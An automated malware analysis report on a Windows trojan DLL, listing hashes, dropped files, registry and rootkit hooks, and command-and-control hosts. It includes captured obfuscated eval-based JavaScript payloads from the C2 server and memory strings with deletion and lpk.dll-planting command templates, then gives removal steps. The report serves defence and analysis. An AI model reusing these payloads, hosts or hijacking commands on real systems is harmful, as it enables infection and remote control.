MD5: a98333ea1155f93d16cb62e7910a0019
SHA1: 916f1bcdffce0e41004bc5adf7d8230002e82348
SHA256: 045f8e8923784a468721bba895546f24070a99fddeb564b7f6b90d57b1c52366
SSDeep: 1536:S0qfWT5MVA90d89X5oWz2vZ9/IezAqiPeMftpw50qfWT5MSJRLY313mqA2b/6:VwWT5ady0k2vLjsRPeOpwGwWT5DJR0FS
Size: 94208 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: CodecPerformer
Created at: 2013-05-10 15:24:48
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

regsvr32.exe:980
hrl1.tmp:416

The Trojan injects its code into the following process(es):

cgyygi.exe:680

File activity

The process regsvr32.exe:980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (81 bytes)

The process cgyygi.exe:680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\RCX2.tmp (26843 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\lpk.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\lpk.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Reader\9.3\ARM\lpk.dll (601 bytes)
%System%\gei33.dll (12 bytes)

The Trojan deletes the following file(s):

%System%\gei33.dll (0 bytes)

The process hrl1.tmp:416 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\cgyygi.exe (601 bytes)

Registry activity

The process regsvr32.exe:980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 26 8F FE E6 7D D4 F6 70 43 0C 5E D2 FF 41 D6"

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 734 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

The Trojan installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
NtCreateProcessEx
NtCreateProcess
NtCreateFile

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://www.0791hj.com/	183.60.110.81
jayqq0.3322.org	115.47.35.201
rat3.100geili.com	183.60.111.183
rat2.100geili.com	183.60.111.183

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CNC Shadowserver Reported CnC Server IP group 3
ET CNC Shadowserver Reported CnC Server IP group 2
ET CURRENT_EVENTS Googlebot User-Agent Outbound (likely malicious)

Traffic

GET / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1;  hXXp://VVV.google.com/bot.html)

Host: VVV.0791hj.com

Connection: Keep-Alive

.
HTTP/1.1 200 OK

Content-Type: text/html

Content-Length:   70

Pragma: no-cache

Cache-control: no-store
<html><body><script></script><script>var
 of="",pf="",sf,qf=new Array(),rf;function mf(nf){for(sf=0;sf<rf.le
ngth;sf  )qf[sf]=rf.charCodeAt(sf);sf="sf=44;for(;sf>=2;sf--){qf[sf
]=(qf[sf] qf[sf-1])&0xff;}";eval(sf);for(sf=45;sf>=3;sf--){qf[sf]=q
f[sf]^103;qf[sf]=(-qf[sf])&0xff;}sf=2;while(true){if(sf>46)break;qf
[sf]=(qf[sf]-qf[sf 1])&0xff;sf  ;}rf="";for(sf=1;sf<qf.length-1;sf 
 )if(sf%7)rf =String.fromCharCode(qf[sf]^nf);eval("sf=eval;sf(rf);");}
rf="\xb3\xd6\xa5\x85\xf6\x908\xaaq\xfb\xc4\xfd\x12=]O\xa5a\xf6\xb5H\xb
e\x90D\r\x96o\xdb\xbaO\x03iI\xb5a\x09\x16af\xa1\xa91\xf9\xdfF\xabc\x9c
";mf(161);</script><br><br><br><center>&
lt;h3><p>..............................JavaScript</p>&l
t;/h3></center></body></html>..

GET / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1;  hXXp://VVV.google.com/bot.html)

Host: VVV.0791hj.com

Connection: Keep-Alive

.
HTTP/1.1 200 OK

Content-Type: text/html

Content-Length:   91

Pragma: no-cache

Cache-control: no-store
<html><body><script></script><script>var
 ef="",ff="",if_,gf=new Array(),hf;function cf(df){for(if_=0;if_<hf
.length;if_  )gf[if_]=hf.charCodeAt(if_);if_=3;while(true){if(if_>4
6)break;gf[if_]=((((gf[if_] 248)&0xff)<<2)&0xff)|(((gf[if_] 248)
&0xff)>>6);gf[if_]=gf[if_]^209;if_  ;}if_=3;do{if(if_>45)brea
k;gf[if_]=(((((gf[if_]-gf[if_ 1])&0xff) 2)&0xff)>>1)|((((((gf[if
_]-gf[if_ 1])&0xff) 2)&0xff)<<7)&0xff);if_  ;}while(true);for(if
_=4;if_<=43;if_  ){gf[if_]=((((gf[if_]^183) 154)&0xff)>>5)|((
(((gf[if_]^183) 154)&0xff)<<3)&0xff);}hf="";for(if_=1;if_<gf.
length-1;if_  )if(if_%7)hf =String.fromCharCode(gf[if_]^df);eval("if_=
eval");if_(hf);}hf="\xe5\xf0\xee\xbe\x02\xd8\x87N\xe7j\xe0o\x94\xd2\xe
9\x99`\xee\x85\xf8\x06\xfc.\xa0\xea\x8c\x80>4\xd5\xe3\xea\x90\xbe\x
86\xf9A\x04?\x85\xf36i\xe8\x12\xe4\x14!";cf(135);</script><br
><br><br><center><h3><p>.............
.................JavaScript</p></h3></center></bo
dy></html>..

GET / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1;  hXXp://VVV.google.com/bot.html)

Host: VVV.0791hj.com

Connection: Keep-Alive

.
HTTP/1.1 200 OK

Content-Type: text/html

Content-Length:   82

Pragma: no-cache

Cache-control: no-store
<html><body><script></script><script>var
 ee="",fe="",cf,af=new Array(),bf;function ce(de){for(cf=0;cf<bf.le
ngth;cf  )af[cf]=bf.charCodeAt(cf);cf="for(cf=1;cf<=50;){af[cf]=(af
[cf]-af[cf 1])&0xff;af[cf]=(((af[cf]-129)&0xff)-20)&0xff;cf  ;}";eval(
cf);cf=2;while(cf<=51){af[cf]=(af[cf] af[cf 1])&0xff;af[cf]=(af[cf]
>>3)|((af[cf]<<5)&0xff);cf  ;}cf=4;while(cf<=52){af[cf]
=(((-af[cf])&0xff) af[54])&0xff;af[cf]=((af[cf]<<7)&0xff)|(af[cf
]>>1);cf  ;}bf="";for(cf=1;cf<af.length-1;cf  )if(cf%6)bf =St
ring.fromCharCode(af[cf]^de);eval("cf=eval");cf(bf);}bf="5=\x151.\xb3\
xf7\xdc\x11\x85.\xae\xe76\xf7O4\xd7\xbcD\xf6!#O|\xc7(_\xd1\xc8Y\x12\x0
8 V\xed\x1e\xe6\xb6\xb3\x83\x90\xf0(\xc9\xb0\xc6\x8d\xf2wr\xff?\xcd\xc
c";ce(228);</script><br><br><br><center>
<h3><p>..............................JavaScript</p>&
lt;/h3></center></body></html>..

GET / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1;  hXXp://VVV.google.com/bot.html)

Host: VVV.0791hj.com

Connection: Keep-Alive

.
HTTP/1.1 200 OK

Content-Type: text/html

Content-Length:   81

Pragma: no-cache

Cache-control: no-store
<html><body><script></script><script>var
 ns="",os="",rs,ps=new Array(),qs;function ls(ms){for(rs=0;rs<qs.le
ngth;rs  )ps[rs]=qs.charCodeAt(rs);rs="rs=3;do{if(rs>47)break;ps[rs
]=(~((ps[rs]-150)&0xff))&0xff;rs  ;}while(true);";eval(rs);rs=47;do{if
(rs<2)break;ps[rs]=(ps[rs]>>7)|((ps[rs]<<1)&0xff);ps[rs
]=((ps[rs]^233) ps[0])&0xff;rs--;}while(true);rs=3;while(rs<=46){ps
[rs]=(((ps[rs]>>7)|((ps[rs]<<1)&0xff)) 12)&0xff;ps[rs]=(ps
[rs] 171)&0xff;rs  ;}qs="";for(rs=1;rs<ps.length-1;rs  )if(rs%6)qs 
=String.fromCharCode(ps[rs]^ms);eval("rs=eval;rs(qs);");}qs="_\xed\xbe
*\xbf\x01v\xebZ\xc1\x01\x00X\x80\xabj\x01*\xd3\x1d*\xec\x9a1\xfb\xb1\x
9d \xbf@\x8e\xeb\xea.f\x1dX\x16\x1c\x80\xc1\x1cM\x1c1\x9a\x01\xe4\xdc"
;ls(154);</script><br><br><br><center>&l
t;h3><p>..............................JavaScript</p><
;/h3></center></body></html>..

GET / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1;  hXXp://VVV.google.com/bot.html)

Host: VVV.0791hj.com

Connection: Keep-Alive

.
HTTP/1.1 200 OK

Content-Type: text/html

Content-Length:   79

Pragma: no-cache

Cache-control: no-store
<html><body><script></script><script>var
 do_="",eo="",ho,fo=new Array(),go;function bo(co){for(ho=0;ho<go.l
ength;ho  )fo[ho]=go.charCodeAt(ho);for(ho=48;;){if(ho<3)break;fo[h
o]=(fo[ho] fo[ho-1])&0xff;fo[ho]=(((fo[ho] 77)&0xff) 149)&0xff;ho--;}h
o="ho=48;for(;ho>=2;){fo[ho]=(((fo[ho]-fo[ho-1])&0xff)-24)&0xff;ho-
-;}";eval(ho);ho=48;for(;;){if(ho<1)break;fo[ho]=(((-fo[ho])&0xff)&
gt;>2)|((((-fo[ho])&0xff)<<6)&0xff);ho--;}go="";for(ho=1;ho&l
t;fo.length-1;ho  )if(ho%6)go =String.fromCharCode(fo[ho]^co);eval("ho
=eval;ho(go);");}go=";z\x94T\xe2\x86*\x18_F\x91\x88g\xc2\xf5\xdc\x27\x
12\x9f{\xed\xad\xdf\xce\xc4\x13\xf5\x84\x1b\xd2P(\xe2J,\xa4]\r\xb6\x86
\xf0\xb41-\xaar\xcb\xbc\xd1\xb9\x02";bo(214);</script><br>
<br><br><center><h3><p>.................
.............JavaScript</p></h3></center></body&g
t;</html>..

The Trojan connects to the servers at the folowing location(s):

.text

`.data

.rsrc

msvcrt.dll

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

ole32.dll

regsvr32.pdb

_wcmdln

RegCloseKey

RegOpenKeyExW

Excessive # of DLL's on cmdline

5.1.2600.5512 (xpsp.080413-2105)

REGSVR32.EXE

Windows

Operating System

5.1.2600.5512

Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall

Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.

LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.

%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.

OleUninitialize failed.["%1" is not an executable file and no registration

cgyygi.exe_680:

`.text

`.rdata

@.data

.rsrc

MFC42.DLL

MSVCRT.dll

_acmdln

WinExec

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

RegOpenKeyA

ADVAPI32.dll

WS2_32.dll

WINMM.dll

WININET.dll

gei%u.dll

PlusCtrl.dll

ASP.NET State Servicesvbw Transaction Coordinator Service

Provides support for out-of-to-processmtn Transaction Coordinator Service.

tjayqq0.3322.org:100

bpk%c%c%c%cÌn.exe

kernel32.dll

SOFTWARE.LOG

rat3.100geili.com:9000

rat2.100geili.com:8000

@@@8:mos.il

upu.ko>>>FDqok0uru

>=0
qeg889.:[email protected]
mig445.2xer444<:qoc.mp
%c%c%c%c%c%c.exe
%u MB
%u MHz
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1;  http://www.google.com/bot.html)
Host: %s:%d
Host: %s
Referer: http://%s
%s http://%s:%d%s
%d.%d.%d.%d
192.168.1.244
%c%c%c%c%c%c%
www.0791hj.com
@.rsrc
@.reloc
SHELL32.dll
SHLWAPI.dll
lpk.dll
A.pz70k
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe

cgyygi.exe_680_rwx_00413000_00007000:


A.pz70k

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   regsvr32.exe:980
   hrl1.tmp:416

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (81 bytes)
   C:\RCX2.tmp (26843 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\lpk.dll (601 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\lpk.dll (601 bytes)
   %Documents and Settings%\All Users\Application Data\Adobe\Reader\9.3\ARM\lpk.dll (601 bytes)
   %System%\gei33.dll (12 bytes)
   %System%\cgyygi.exe (601 bytes)

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
7. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.